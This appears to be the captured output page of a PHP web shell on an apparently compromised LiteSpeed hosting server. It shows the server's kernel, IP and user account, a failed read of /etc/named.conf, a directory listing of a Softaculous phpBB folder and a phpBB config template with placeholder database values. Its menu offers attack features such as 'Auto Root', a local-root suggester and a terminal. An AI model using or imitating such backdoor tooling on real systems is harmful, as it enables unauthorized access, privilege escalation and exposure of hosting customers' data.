Linux sh52.ich-4.com 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
Server IP : 198.143.147.58 & Your IP : 216.73.217.21
Domains :
Cant Read [ /etc/named.conf ]
User : actualbuzz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
phpbb /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-04-29 11:45
languages
[ DIR ]
drwxr-xr-x
2026-04-29 11:45
php53
[ DIR ]
drwxr-xr-x
2026-04-29 11:45
php56
[ DIR ]
drwxr-xr-x
2026-04-29 11:45
php71
[ DIR ]
drwxr-xr-x
2026-04-29 11:45
php81
[ DIR ]
drwxr-xr-x
2026-04-29 11:45
php82
[ DIR ]
drwxr-xr-x
2026-04-29 11:45
changelog.txt
4.74
KB
-rw-r--r--
2026-04-28 06:07
clone.php
4.4
KB
-rw-r--r--
2026-04-28 08:16
config.php
481
B
-rw-r--r--
2021-12-23 06:54
edit.php
4.39
KB
-rw-r--r--
2026-04-28 08:16
edit.xml
433
B
-rw-r--r--
2021-12-23 06:54
fileindex.php
333
B
-rw-r--r--
2021-12-23 06:54
import.php
3.16
KB
-rw-r--r--
2026-04-28 08:16
info.xml
2.94
KB
-rw-r--r--
2026-04-28 06:07
install.js
1
KB
-rw-r--r--
2021-12-23 06:54
install.php
8.81
KB
-rw-r--r--
2026-04-28 08:16
install.xml
2.39
KB
-rw-r--r--
2021-12-23 06:54
io_lock.lock
2
B
-rw-r--r--
2021-12-23 06:54
md5
2.21
KB
-rw-r--r--
2026-04-28 08:16
notes.txt
1.54
KB
-rw-r--r--
2022-09-23 06:51
upgrade.php
4.91
KB
-rw-r--r--
2026-04-28 08:16
upgrade.xml
370
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
<?php // phpBB 3.3.x auto-generated configuration file // Do not change anything in this file! $dbms = 'phpbb\\db\\driver\\mysqli'; $dbhost = '[[softdbhost]]'; $dbport = ''; $dbname = '[[softdb]]'; $dbuser = '[[softdbuser]]'; $dbpasswd = '[[softdbpass]]'; $table_prefix = '[[dbprefix]]'; $phpbb_adm_relative_path = 'adm/'; $acm_type = 'phpbb\\cache\\driver\\file'; @define('PHPBB_INSTALLED', true); @define('PHPBB_ENVIRONMENT', 'production'); // @define('DEBUG_CONTAINER', true);